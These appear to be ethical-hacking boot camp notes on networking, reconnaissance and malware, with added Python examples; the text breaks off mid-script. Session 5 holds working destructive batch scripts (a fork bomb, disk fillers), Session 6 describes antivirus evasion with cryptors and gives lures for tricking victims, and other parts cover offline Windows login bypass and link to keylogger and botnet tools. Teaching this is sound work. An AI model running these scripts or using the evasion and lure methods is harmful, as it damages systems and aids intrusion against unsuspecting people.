- Boot Camp Day 1
- ===============
- Session 1
- =========
- Introduction to Information Security
- ------------------------------------
- Information
- -----------
- A collection of data that has been organised so that it carries meaning is known as Information.
- Data
- ----
- It is raw facts and figures. Data can be anything:
- Text
- Number
- Image
- Audio
- Video
- A single piece of data, on its own, never makes sense.
- Security
- --------
- Protecting information and systems from leakage, unauthorised access and breaches.
- Information
- ===========
- Personal Information
- Sensitive Information
- Financial Information
- Economical Information
- Banking Information
- Hackers
- =======
- A person who has deep knowledge in the field of computers and technology, and understands:
- How a system works.
- How processes work.
- How new technologies work.
- Client-side and server-side processing.
- Hacking
- =======
- Gaining access to someone's systems or data, with or without their authorisation. With authorisation it is legal (ethical hacking); without it, it is illegal.
- Types of Hackers
- ================
- 1. White Hat Hacker
- They are the good guys, who work for the welfare of the organisation. They hack only with authorisation, and only to improve security.
- Rahul Tyagi
- Abhijeet Singh
- Sanjeev Multani
- 2. Black Hat Hacker
- They are the bad guys, who bring chaos and destruction to the cyber society. They usually have only one thing in mind: money.
- Kevin Mitnick
- Lizard Squad
- 3. Grey Hat Hacker
- They are a combination of both: they hack into things without authorisation, but usually without malicious intent, to uncover the dirty things. Their declared focus is the welfare of society and the people.
- Anonymous
- The Legions
- Hacktivism
- Julian Assange --> WikiLeaks
- Edward Snowden
- Script Kiddies
- --------------
- Copy + Paste --> Those who just use the code and techniques created by others, without knowing how things work.
- N00bz
- -----
- They are newcomers who are just beginning to learn something in the cyber world.
- Crackers
- --------
- They are not hackers, but they are very good at cracking passwords: file passwords, folder passwords, OS passwords, email passwords.
- Why Do People Hack?
- -------------------
- Security
- Money
- Revenge
- Curiosity|knowledge
- Fame
- Zoo Zoo Hacker
- Rafi Hacker
- Cyber Crimes And Laws
- =====================
- IT Act 2000 and the IT (Amendment) Act 2008
- There are many types of cyber crime (the notes count 28), but all of them fall into these few groups:
- --> Hacking
- --> Identity Theft
- --> Insult, Online Defamation
- --> Harassment
- --> Cyber Terrorism
- Section 43:
- Penalty and compensation for damage to computer and computer system
- Section 65:
- Tampering with Computer Source Documents
- Section 66:
- Computer Related Offences
- Section 67:
- Punishment for publishing or transmitting obscene material in electronic form
- Section 71:
- Penalty For Misrepresentation
- Section 72:
- Breach of confidentiality and privacy
- Section 73:
- Penalty for publishing an electronic signature certificate false in certain particulars | Signature Forgery
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 2
- =========
- Network Terminology I
- ---------------------
- Network
- =======
- A connection of two or more devices, with the sole purpose of information interchange.
- Topology
- ========
- How the devices are connected to each other in the network, i.e. the physical layout of the network.
- 1. Star Topology
- ================
- When all end devices are connected to a central connecting device (e.g. a switch).
- If the central device is down, then communication is not possible.
- 2. Ring Topology
- ================
- When all of my end devices are connected in a closed circular chain.
- There are two ways of communication in Ring Topology
- 1. Unidirectional
- Either clock or anti clock
- 2. Bidirectional
- Data can go through any direction
- 3. Mesh Topology
- ================
- When all of my devices are connected to every device in the network.
- 4. Bus Topology
- ===============
- When all the end devices are connected to a central communicating line, which is known as Back Bone.
- 5. Hybrid Topology
- ==================
- When two or more type of topologies are connected in the network.
- Protocols
- =========
- A set of rules which every device must follow to communicate in the network.
- 1. IP --> Internet Protocol
- 2. TCP --> Transmission Control Protocol
- 3. UDP --> User Datagram Protocol
- 4. FTP --> File Transfer Protocol
- 5. HTTP --> Hyper Text Transfer Protocol
- 6. SMTP --> Simple Mail Transfer Protocol
- 7. VoIP --> Voice over Internet Protocol (strictly a family of protocols such as SIP and RTP, not a single protocol)
- 8. DHCP --> Dynamic Host Configuration Protocol
- IP Address
- ==========
- Internet Protocol Address
- -------------------------
- It is a logical address given to a device connected to a network or the internet, so that it can communicate. It is unique within a network.
- Version of IP Address
- =====================
- 1. IPv4
- 2. IPv6
- 1. IPv4 --> Internet Protocol Version 4
- ----------------------------------------
- It is a 32-bit address, divided into 4 octets separated by periods (dots).
- 192.168.0.28 ---> IPv4
- 4 octets --> 192|168|0|28
- Each octet is 8 bits (0s and 1s), so it can hold a value from 0 to 255.
- Periods --> dot(.)
- 192 = 128+64 = 11000000
- 168 = 128+32+8 = 10101000
- 0 = 00000000
- 28 = 16+8+4 = 00011100
-     128  64  32  16   8   4   2   1
-     ===============================
-       1   1   0   0   0   0   0   0   = 192
-       1   0   1   0   1   0   0   0   = 168
-       0   0   0   0   0   0   0   0   = 0
-       0   0   0   1   1   1   0   0   = 28
- 192.168.0.28 = 11000000.10101000.00000000.00011100
- It is written in dotted-decimal notation: each octet is a decimal number from 0 to 255.
- Total number of IP addresses --> 2^32 (about 4.3 billion)
- 0.0.0.0 - 255.255.255.255
- Classes of IPv4 Addresses
- =========================
- 1. Class A --> 0.0.0.0 - 127.255.255.255
- 2. Class B --> 128.0.0.0 - 191.255.255.255
- 3. Class C --> 192.0.0.0 - 223.255.255.255
- 4. Class D --> 224.0.0.0 - 239.255.255.255
- 5. Class E --> 240.0.0.0 - 255.255.255.255
- Class D --> multicast. Class E --> reserved for experimental use. Classful addressing is historical; modern networks use CIDR prefixes (e.g. /24) instead of classes.
- 2. IPv6 -> Internet Protocol Version 6
- ======================================
- It is a 128-bit address, written as 8 groups of 16 bits in hexadecimal, separated by colons. The low 64 bits (the interface identifier) can be derived from the 48-bit MAC address using the EUI-64 method: flip the universal/local bit of the first byte and insert ff:fe between the third and fourth bytes. (Modern systems usually prefer random "privacy" identifiers, because EUI-64 exposes the MAC to the whole internet.)
- 0000:0000:0000:0000:0000:0000:0000:0000
- FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
- Total number of IPv6 --> 2^128
- f4:8c:50:5f:97:18 -----------> MAC address
- f6:8c:50:ff:fe:5f:97:18 -----> EUI-64 (f4 becomes f6 after flipping bit 1, ff:fe inserted in the middle)
- fe80::f68c:50ff:fe5f:9718 ---> link-local IPv6 address built from it (:: stands for the run of zero groups)
- Types of IP Address
- ===================
- 1. Public IP Address | Global IP Address
- The IP address assigned by the ISP, which is routable on the internet.
- Google.com --> myipaddress --> 125.63.71.34
- ipcow.com ----> 125.63.71.34
- ipchicken.com > 125.63.71.34
- User-Agent Information
- ======================
- Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
- Hostname = 125.63.71.34.reverse.spectranet.in
- Platform = X11 (the X Window System, i.e. a desktop Linux)
- Operating System = Ubuntu
- Browser Name = Firefox
- Browser Version = 60.0
- Is Mobile Device = False
- Is Beta = False
- Screen Resolution = 1366 x 768
- 2. Private IP Address | Local IP Address
- This is the IP address given to end devices inside the local network, usually by the router (via DHCP). Private ranges (RFC 1918): 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16. They are not routable on the internet.
- MS-OS --> cmd ---> ipconfig
- Linux/Unix --> Terminal --> ifconfig (or `ip addr` on modern distributions, where ifconfig may not be installed)
- ifconfig --> interface configuration
- IP Subnetting
- =============
- Division of an IP address block into smaller sub-networks, so that address wastage is reduced.
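- The following is an added example (not code from the boot camp notes) that carries the IPv4 octet-to-binary conversion, the address classes, the EUI-64 derivation of an IPv6 interface identifier from a MAC, and a subnet calculation through in Python, using only the standard library `ipaddress` module. The MAC and addresses are the ones from the notes; the /26 block is an assumed example.

```python
"""Added example (not from the boot camp notes): IPv4 octet/binary
conversion, address class, CIDR subnetting and an EUI-64 IPv6 link-local
address built from a MAC address. Standard library only."""
import ipaddress

# Classful ranges by first octet (historical; CIDR is what networks use now).
CLASS_RANGES = (("A", 0, 127), ("B", 128, 191), ("C", 192, 223),
                ("D", 224, 239), ("E", 240, 255))


def ipv4_to_binary(addr: str) -> str:
    """'192.168.0.28' -> '11000000.10101000.00000000.00011100'."""
    octets = [int(o) for o in addr.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not a dotted-decimal IPv4 address: {addr}")
    return ".".join(f"{o:08b}" for o in octets)


def ipv4_class(addr: str) -> str:
    """Classful letter (A-E) decided by the first octet."""
    first = int(addr.split(".")[0])
    for name, lo, hi in CLASS_RANGES:
        if lo <= first <= hi:
            return name
    raise ValueError(addr)


def subnet_summary(cidr: str) -> dict:
    """Network, broadcast, mask and usable hosts for a block such as '192.168.0.0/26'."""
    net = ipaddress.ip_network(cidr, strict=False)
    return {
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "netmask": str(net.netmask),
        "usable_hosts": max(net.num_addresses - 2, 0),
    }


def mac_to_eui64(mac: str) -> str:
    """EUI-64 from a 48-bit MAC: flip the U/L bit (0x02) of byte 0, insert ff:fe."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError(f"bad MAC: {mac}")
    eui = bytes([raw[0] ^ 0x02]) + raw[1:3] + b"\xff\xfe" + raw[3:]
    return ":".join(f"{b:02x}" for b in eui)


def link_local_from_mac(mac: str) -> str:
    """fe80::/64 address carrying the EUI-64 interface identifier, compressed."""
    eui_hex = mac_to_eui64(mac).replace(":", "")
    groups = [eui_hex[i:i + 4] for i in range(0, 16, 4)]
    return str(ipaddress.IPv6Address("fe80:0:0:0:" + ":".join(groups)))


def is_private(addr: str) -> bool:
    """True for RFC 1918 / loopback / link-local style addresses."""
    return ipaddress.ip_address(addr).is_private


if __name__ == "__main__":
    print(ipv4_to_binary("192.168.0.28"), "class", ipv4_class("192.168.0.28"))
    print(subnet_summary("192.168.0.0/26"))
    print(mac_to_eui64("f4:8c:50:5f:97:18"), link_local_from_mac("f4:8c:50:5f:97:18"))
    print(is_private("192.168.0.28"), is_private("125.63.71.34"))
```

- The EUI-64 step reproduces the f4 -> f6 flip shown in the notes; `ipaddress` does the :: compression and the subnet arithmetic, so the hand calculation can be checked against it.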
- NAT --> Network Address Translation
- ===================================
- It is a service that runs on the router/gateway, which maps private IP addresses to the public IP address for outgoing traffic and maps the replies back to the right private address.
- DHCP
- ====
- Dynamic Host Configuration Protocol
- -----------------------------------
- It is the protocol, usually run by the router, which is responsible for allocating an IP address (plus subnet mask, default gateway and DNS servers) to devices joining the network.
- IP-Pool
- =======
- It is the collection of IP addresses which can be handed out to devices.
- DHCP Server
- ===========
- It is the server which provides IP Address to the devices from the IP Pool.
- DHCP allocates the IP Address on the basis of lease time period.
- MS-OS
- =====
- cmd ---> ipconfig /release
- ipconfig /renew
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 3
- =========
- Network Terminology II
- ======================
- Types Of Network
- ----------------
- 1. PAN --> Personal Area Network --> Bluetooth, SHAREit --> about 1-10 m
- 2. LAN --> Local Area Network --> WiFi, a whole campus --> up to a few km
- 3. MAN --> Metropolitan Area Network --> a whole city --> roughly 5-50 km
- 4. WAN --> Wide Area Network --> the Internet --> unlimited
- These are size categories, not strict containment: a WAN interconnects many LANs and MANs.
- 1. Intranet --> Intra -> Inside | Net -> Network
- Network infrastructure which works inside a campus and cannot be accessed by people outside the campus.
- 2. Internet --> The worldwide interconnection of many networks (an internetwork).
- Ports
- =====
- Ports are the specific endpoints via which a device can use or offer a service. There are two different types of ports:
- 1. Physical Ports
- 2. Virtual Ports
- 1. Physical Ports
- =================
- These are the ports which we can see and touch. They are present on the device and are used for connecting other hardware.
- USB
- Audio Jack
- HDMI
- VGA
- Charging Port
- 2. Virtual Ports
- ================
- These are the ports via which network services are used. They are not tangible: each is a 16-bit number that identifies a specific service on a host.
- There are 65,536 virtual ports (0-65535).
- They are also of three types:
- 1. Well-Known | Pre-Defined Ports
- 2. Registered Ports
- 3. Dynamic Ports
- 1. Well-Known | Pre-Defined Ports
- =================================
- These are the ports assigned by IANA (the internet community) for running specific well-known services.
- 21 --> FTP
- 22 --> SSH
- 23 --> Telnet
- 80 --> HTTP
- 443 --> HTTPS
- These services can also run on other ports, and other services can be put on these ports; the numbers are a convention, not something enforced.
- Ports 0-1023 are categorised as well-known ports.
- 2. Registered Ports
- ===================
- These are ports 1024-49151, registered with IANA by organisations for running their specific services.
- Oracle ----> Database ---> MySQL --> 3306
- Apple -----> iPhone -----> iTunes -> 3689
- Black Berry Enterprise ---> server > 3101
- 3. Dynamic Ports
- ================
- These are ports 49152-65535, which are neither well-known nor registered. The OS hands them out as temporary source ports, and any local user can use them for their own purpose.
- 1337 --> LEET port | Hacker's port (slang only; strictly, 1337 lies in the registered range)
- Our computer works with numbers, not names. Humans remember names easily, but a computer addresses other hosts by IP address, so we need a service that translates names into numbers.
- DNS
- ===
- Domain Name System|service
- ==========================
- This service maps domain names to IP addresses (and IP addresses back to names), so that the request can be sent to the right server and the response fetched.
- www.google.com ----> Open front end of google
- 172.217.161.4 -----> Open front end of google
- www.google.co.in --> 172.217.24.227
- www.google.co.in
- in --> top-level domain (ccTLD) for India
- co --> second-level label, used for companies in India
- google ----> the registered domain name
- www|mail|drive|calendar --> subdomains (hostnames) under the domain; the root of the DNS tree is the empty label, written as a trailing dot (www.google.co.in.)
- Proxy
- =====
- These are intermediary servers which forward your requests, so that the destination sees the proxy's address instead of your public IP address.
- kproxy.com
- ipcow.com ---> 125.63.71.34 ---> Original IP Address (Public)
- kproxy.com --> ipcow.com ---> 192.95.12.100 -> the proxy's IP address
- VPN --> Virtual Private Network
- ===============================
- They work like proxy servers, but they are much more advanced than proxy servers in the following ways:
- 1. They are used to maintain the anonymity, hiding and masking IP Address
- 2. They provide the encryption of data.
- 3. They provide the tunneling.
- Tunnelling = a secret passage: an encrypted tunnel through the public network
- Used for connecting to the internal network of an organisation
- Services
- ========
- 1. Online Based Service ----> kproxy.com
- 2. Extension Based Service -> anonymoX
- 3. Standalone Service ------> Proper software or hardware which provides these services.
- psiphon3
- UltraSurf
- Proxpn
- HotSpot Shield
- openVPN
- OSI Model
- =========
- Open System Interconnection Model
- ---------------------------------
- It is a reference model describing how network communication is layered. It was never widely implemented as a protocol suite; it is used as an ideal model for teaching and design, while real networks run the TCP/IP model.
- OSI is 7 layer approach model
- 1. Physical Layer
- 2. Data Link Layer
- 3. Network Layer
- 4. Transport Layer
- 5. Session Layer
- 6. Presentation Layer
- 7. Application Layer
- TCPIP Model
- ============
- It is a 4-layer model (Link, Internet, Transport, Application), similar to OSI with some layers merged. Layers are again independent of each other. It is the model the internet actually runs on; OSI is only a reference.
- Web Technology Basics
- =====================
- 1. Domain Name
- 2. Hosting Space
- 3. Server
- 4. DataBase
- 5. Technology
- Client Side
- Server Side
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 4
- =========
- Information Gathering and Digital Footprinting
- ==============================================
- Phases of hacking
- -----------------
- These phases should be followed, in order, to perform any kind of hacking (or penetration test).
- 1. Information Gathering
- 2. Scanning
- 3. Gaining Access
- 4. Maintaining Access
- 5. Covering Tracks
- Information Gathering
- ---------------------
- To collect as much Information as possible about the target.
- Information Gathering is divided into further
- 1. Network Specific
- 2. Target Specific
- 1. Network Specific
- ===================
- To collect the information about the network
- Number Of people Connected
- IP Address allocated to the connected devices
- MAC Address
- Name Of the Vendor
- If possible --> Access of the shared folder
- 1. Advanced IP Scanner
- 2. Angry IP Scanner
- 3. SoftPerfect Network Scanner
- https://www.softperfect.com/products/networkscanner/
- NMAP --> Network Mapping tool
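- As an added example (not part of the boot camp notes, and not Nmap's own code), the following Python shows what a port scanner such as Nmap does in its simplest mode, a TCP connect scan, together with a banner grab of the kind used to identify a service. A constructed loopback "SSH" listener is started inside the block so it runs offline; the port numbers it uses are whatever the OS hands out.

```python
"""Added example (not from the boot camp notes): a minimal TCP connect scan,
the same technique as Nmap's -sT, plus a banner grab. A constructed loopback
service is started so the whole thing runs offline."""
import socket
import threading
from contextlib import closing


def scan_ports(host: str, ports, timeout: float = 0.5) -> dict:
    """Return {port: 'open' | 'closed' | 'filtered'} using full TCP connects.
    RST (connection refused) -> closed; no answer within timeout -> filtered
    (typically a firewall silently dropping the SYN)."""
    results = {}
    for port in ports:
        with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
            s.settimeout(timeout)
            try:
                s.connect((host, port))
                results[port] = "open"
            except ConnectionRefusedError:
                results[port] = "closed"
            except OSError:                   # timeout, unreachable, ...
                results[port] = "filtered"
    return results


def grab_banner(host: str, port: int, timeout: float = 1.0) -> str:
    """Read whatever the service says first (SSH, FTP and SMTP announce themselves)."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        return s.recv(256).decode(errors="replace").strip()


def start_dummy_service(banner: bytes = b"SSH-2.0-demo_server\r\n"):
    """Constructed target: listens on 127.0.0.1 on an ephemeral port and sends
    a banner to every client. Returns (port, stop_function)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(0.2)
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            try:
                with conn:
                    conn.sendall(banner)
            except OSError:
                pass                         # client already went away
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop.set


def find_closed_port() -> int:
    """Pick a loopback port nobody is listening on (bind, read it back, release)."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    port, stop = start_dummy_service()
    print(scan_ports("127.0.0.1", [port, find_closed_port()]))
    print(grab_banner("127.0.0.1", port))
    stop()
```

- A connect scan completes the three-way handshake, so it shows up in the target's logs; Nmap's default SYN scan avoids the final ACK, which needs raw sockets and root. Against a real host, "filtered" usually means a firewall rather than an absent service.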
- 2. Target Specific
- ==================
- i. Web site or web application
- ii. Human Specific
- Web site or web Application
- ===========================
- IP Address
- Ping
- > 65.52.169.46
- Server Information
- Dedicated or shared
- https://www.yougetsignal.com
- Database Information
- MX and NS Records
- Name of the registrar
- Technologies
- Allowed and disallowed paths
- |--> robots.txt (lists the paths the site asks crawlers not to index, which often reveals interesting directories)
- https://whois.net/
- https://www.yougetsignal.com
- https://whois.icann.org/en
- https://mxtoolbox.com/
- Wappalyzer --> browser extension --> helps gather information about the technologies used behind a web site or web application.
- Online Nmap
- https://pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
- Human Specific
- ==============
- Social Network
- Social Networking Websites
- LinkedIn
- Twitter
- Facebook
- Dating Websites
- Matrimonial Websites
- Job Portals
- Fake Surveys
- Spy Services
- Tools
- =====
- Maltego
- It is an enterprise-grade information gathering (OSINT) tool. It helps gather information about every aspect of a target and links the findings graphically.
- Community Edition ---> free
- Not all transforms work in the free edition.
- https://www.paterva.com/web7/downloads.php
- OS Login Bypass
- ===============
- When you log into the OS, Windows asks for a password at start-up.
- 1. Online Method
- 2. Offline Method
- 1. Online Method
- ================
- When you need to change the OS login password while the system is up and you do not know the current password. You need an account that is already an administrator, and the Local Users and Groups console exists only in the Professional/Ultimate/Enterprise editions, not Home.
- 1. Right click on "My Computer" (or "This PC")
- 2. Click on "Manage"
- 3. Click on "Local Users and Groups", in the left pane
- 4. Click on "Users"
- 5. Choose the user, for whom you want to change the password.
- 6. Right Click
- 7. Set Password
- 2. Offline Method
- =================
- This is the situation when the device is shut down (or you have no administrator account), so the management console cannot be used; the password hashes are edited or bypassed offline.
- SAM --> Security Account Manager (the database of local account password hashes)
- C:\Windows\System32\config\SAM
- Hiren Boot CD
- Kon Boot CD
- These are live bootable tools. We use tools like Rufus to write them to a USB drive and make it bootable.
- BIOS --> Basic Input Output System
- Live OS ---> the machine boots from the bootable media instead of its internal disk (selected via the BIOS/UEFI boot order); the BIOS itself is not replaced. Full-disk encryption (e.g. BitLocker) stops offline SAM editing.
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 5
- =========
- Malware Illustration
- --------------------
- Malware --> MAL + WARE
- MAL -> MALicious
- WARE -> softWARE
- Malware is malicious software which can cause harm to the system. It can be anything: a tool, an application, a program, a file.
- Types Of Malware:
- 1. Virus
- 2. Worms
- 3. Trojan
- 4. Keyloggers
- 5. Spyware
- 6. Ransomware
- 7. Botnet
- 8. Rootkits
- 9. Adware
- 1. VIRUS
- ========
- "Vital Information Resources Under Siege" is a popular backronym; the word really just means a program that replicates by attaching itself to other programs or files.
- A virus can be an application, tool or piece of software which harms the system and the system files of the device.
- Symptoms of a virus:
- Slow processing
- Files deleted
- Attribute change (e.g. files made hidden or system)
- Extension change
- Shortcut files appearing in place of the originals
- It remains dormant until a user executes the infected file. A virus needs human assistance to run.
- Batch File Virus
- ================
- (Demonstration scripts, saved as .bat. Each one damages or exhausts the machine it runs on; run them only inside a throw-away VM.)
- 1. Infinite Folder
- ------------------
- REM creates folders with random names until the disk or the directory fills up
- :loop
- mkdir %random%
- goto loop
- 2. Cascading folder and file
- ----------------------------
- REM nests a folder inside a folder, writing a text file at every level, until the path-length limit is hit
- :rudra
- mkdir rudr
- echo Hello boys... I'm fine...!! >>rudr.txt
- cd rudr
- goto rudra
- 3. Space Eating Virus
- ---------------------
- REM appends the file to itself, so it grows on every pass until the disk is full
- echo hello>>file.txt
- :loop
- type file.txt>>file.txt
- goto loop
- 4. Process Calling
- ------------------
- REM spawns a new cmd.exe window on every pass until memory runs out
- :loop
- start cmd.exe
- goto loop
- 5. Fork Bombing
- ---------------
- REM %0 is the script's own name; piping it into itself starts two more copies each time
- %0|%0
- https://lucideustech.blogspot.com/2018/04/mac-os-login-screen-bypass-with.html
- Gmail ignores dots in the local part, so all of these addresses deliver to the same mailbox (handy for registering many accounts, and worth knowing when you see them in a log):
- aran.kuanr@gmail.com
- aran.k.uanr@gmail.com
- ara.n.k.u.anr@gmail.com
- a.r.a.n.k.u.a.n.r@gmail.com
- 2. Keyloggers
- =============
- These are applications which capture the keystrokes typed on a device. They sit as an extra layer between the keyboard and the OS, record the keys and dump them to a file or send them away.
- 1. Online Based | Remote --> logs are sent to the attacker (e.g. iStealer)
- 2. Local Storage --> logs are kept on the device for later collection
- Family Key Logger
- http://www.spyarsenal.com/download.html
- BPK Keylogger
- Refog Keylogger
- Screenshotter --> whenever you press a key or click the mouse, the application takes a screenshot.
- Screen Recorder
- 3. Ransomware
- =============
- It is when your system is hijacked and the files are encrypted by the attacker, who demands a ransom in exchange for the decryption key.
- WannaCry
- Petya / NotPetya
- Bad Rabbit
- 4. Worms
- ========
- These are malware which spread by themselves, needing human assistance at most once. Common features:
- Replication
- Copies itself
- Spreads through pen drives, mail or the network, exploiting a flaw on the next host
- Often target specific (written for one platform or one vulnerability)
- Conficker worm --> infected millions of devices
- -x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-
- Session 6
- =========
- 5. Trojans
- ----------
- These are malware which help an attacker gain remote access to the target device. Remote access ---> backdooring. The attacker can download any file, upload any file, use anything and manipulate the data.
- There are two types of trojans:
- 1. Forward Connection
- 2. Reverse Connection
- 1. Forward Connection
- ---------------------
- When the attacker has the target's IP address, he connects directly to the trojan listening on the target system (a bind connection). Problems:
- 1. The target keeps moving --> the IP address of the target keeps changing
- 2. It is very hard for the attacker to learn the target's IP address every time the target changes location, and NAT or a firewall in front of the target usually blocks incoming connections anyway.
- 2. Reverse Connection
- ---------------------
- The attacker always knows his own IP address, so he crafts an application with his own IP address embedded in it and sends it to the target. As soon as the target executes the application, the attacker receives a reverse remote connection (the target connects out, which NAT and most firewalls allow).
- RAT --> Remote Administration | Access Tool
- These are third-party tools which are used for creating trojans.
- Dark Comet
- How Does Anti-Malware Works
- ===========================
- Traditional anti-malware works on signatures: if the signature of the file is in the database it is flagged as malware, otherwise the file is treated as clean. Modern products add heuristics, behavioural monitoring and cloud reputation, so changing the signature alone is not always enough.
- How to evade Anti-Malware?
- ==========================
- If I can change the signature, I can evade the anti-malware. We change the signature of the trojan so that it is no longer matched.
- With the help of these tools we can change the signature of the trojan:
- 1. Binders (glue the trojan to a harmless file)
- 2. Cryptors (encrypt the trojan and prepend a stub that decrypts it at run time)
- 3. Hex Editors --> Neo Hex Editor
- 4. Obfuscators -> Red Gate SmartAssembly
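- To make the signature argument concrete, here is an added example (not from the notes, and not any vendor's engine): a constructed "trojan" byte string, a whole-file hash signature and a byte-pattern signature for it, a one-byte hex edit, and a toy XOR "cryptor". It shows that the hex edit beats the hash but not the pattern, that packing beats both, and that scanning the unpacked bytes (what emulation or behavioural engines effectively do) catches it again. The sample, key and signatures are all made up for the demo.

```python
"""Added example (not from the boot camp notes): why one edited byte defeats
a hash signature, why a byte-pattern signature survives that edit, and why a
simple 'cryptor' (XOR packing) defeats the pattern too until the sample is
unpacked. The sample and both signatures are constructed for the demo."""
import hashlib

# Constructed stand-in for a trojan: an MZ-like header, padding, a tell-tale
# string and some filler. Not a real executable.
SAMPLE = (b"MZ\x90\x00" + b"\x00" * 28
          + b"Connecting back to 203.0.113.5:4444\x00" + b"\xcc" * 16)

# Two kinds of anti-malware signature for that sample.
HASH_SIGS = {hashlib.sha256(SAMPLE).hexdigest()}   # whole-file hash
PATTERN_SIGS = {b"Connecting back to"}             # byte pattern (YARA-style)


def matches_hash(blob: bytes) -> bool:
    return hashlib.sha256(blob).hexdigest() in HASH_SIGS


def matches_pattern(blob: bytes) -> bool:
    return any(p in blob for p in PATTERN_SIGS)


def hex_edit(blob: bytes, offset: int, value: int) -> bytes:
    """What a hex editor does: overwrite a single byte in place."""
    return blob[:offset] + bytes([value]) + blob[offset + 1:]


def xor_pack(blob: bytes, key: bytes) -> bytes:
    """Toy cryptor: XOR with a repeating key. Applying it again unpacks."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def scan(blob: bytes) -> str:
    """Static scan of the bytes as they sit on disk."""
    if matches_hash(blob):
        return "detected (hash)"
    if matches_pattern(blob):
        return "detected (pattern)"
    return "clean"


def scan_unpacked(blob: bytes, key: bytes) -> str:
    """What emulation/behavioural engines effectively do: scan the bytes the
    stub would produce at run time, not only the packed bytes on disk."""
    return scan(xor_pack(blob, key))


if __name__ == "__main__":
    key = b"k3y"
    edited = hex_edit(SAMPLE, 4, 0x01)          # touch one padding byte
    packed = xor_pack(SAMPLE, key)
    print("original  :", scan(SAMPLE))
    print("hex-edited:", scan(edited))
    print("packed    :", scan(packed))
    print("unpacked  :", scan_unpacked(packed, key))
```

- The drop in detections shown in the class results below comes from exactly this: each cryptor layer changes the bytes on disk, but the decryption stub still has to reproduce the original in memory, which is where behaviour-based engines look.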
- Binder and cryptor
- ==================
- Chrome Cryptor
- URGE Cryptor
- Multi-engine scan results for the same trojan:
- Raw --> 57/65 engines detect it
- Raw + Chrome Cryptor --> 35/65
- Raw + Chrome Cryptor + URGE Cryptor --> 29/60
- Raw + Chrome Cryptor + URGE Cryptor + Red Gate SmartAssembly --> 12/65
- Typical lures used to make the victim download and run it:
- Download and install, you will get a Paytm cashback of Rs 500/-
- Download and install the best antivirus
- Download the Facebook hacker --> hack any Facebook account with this application
- Download and install ---> will help you secure your device, 100% guaranteed
- Scan the network with angry IP Scanner
- 6. Botnets
- ==========
- BOTNET = BOT + NET
- BOT = roBOT
- NET = NETwork
- It means a network of compromised devices (bots) which the attacker controls.
- The attacker deploys the trojan on n number of systems and devices and controls them. That whole network of trojaned machines is known as a botnet.
- Ares Botnet
- https://github.com/sweetsoftware/Ares
- 7. Rootkits
- ===========
- Malware which is planted in the root of the device: administrator or kernel level.
- It attacks and affects the kernel level, so it is hard to find and hard to remove.
- System Protection From Malwares and Secure System Configuration
- ===============================================================
- Security
- --------
- 1. Firewall should always be enabled.
- 2. Anti-virus should always be installed and kept updated.
- 3. Windows patches and updates should be applied promptly.
- 4. Always use a sandbox or virtualised environment for analysing or running a suspicious application.
- Sandboxie --> isolated (sandboxed) environment for running and analysing programs
- VirtualBox --> full virtual machine
- 5. EXE Radar --> application control that asks before any unknown executable is allowed to run
- Configuration
- -------------
- 1. attrib --> for checking (and changing) file attributes such as hidden/system
- 2. services.msc --> list of installed services
- 3. Check which services are actually running
- 4. Startup programs
- msconfig ---> Startup tab (Task Manager --> Startup on Windows 8 and later)
- 5. netstat --> active connections
- 6. netstat -b
- -b --> shows the executable that owns each connection (needs an administrator prompt)
- 7. netstat -ona
- -o --> owning process ID | -n --> numeric addresses and ports | -a --> all connections and listening ports
- 8. Firewall rules --> block the trojan's outbound connection
- https://lucideustech.blogspot.com/2018/02/tracing-and-terminating-reverse.html
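- Added example (not from the notes or the linked post): a small Python triage script that parses the text `netstat -ona` prints, keeps only ESTABLISHED connections, and flags those going to an address outside the internal ranges on a port that is not in an assumed allowlist of normal outbound ports, which is the footprint a reverse-connection trojan leaves. The netstat output below is a constructed sample, not a real capture; the allowlist and internal ranges are assumptions to adjust for your network.

```python
"""Added example (not from the boot camp notes): parse `netstat -ona`
output (a constructed sample below) and flag ESTABLISHED connections to
non-internal addresses on unusual ports, the footprint a reverse-connection
trojan leaves. Standard library only."""
import ipaddress
from dataclasses import dataclass

# Constructed sample of `netstat -ona` on a Windows host (not a real capture).
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       2316
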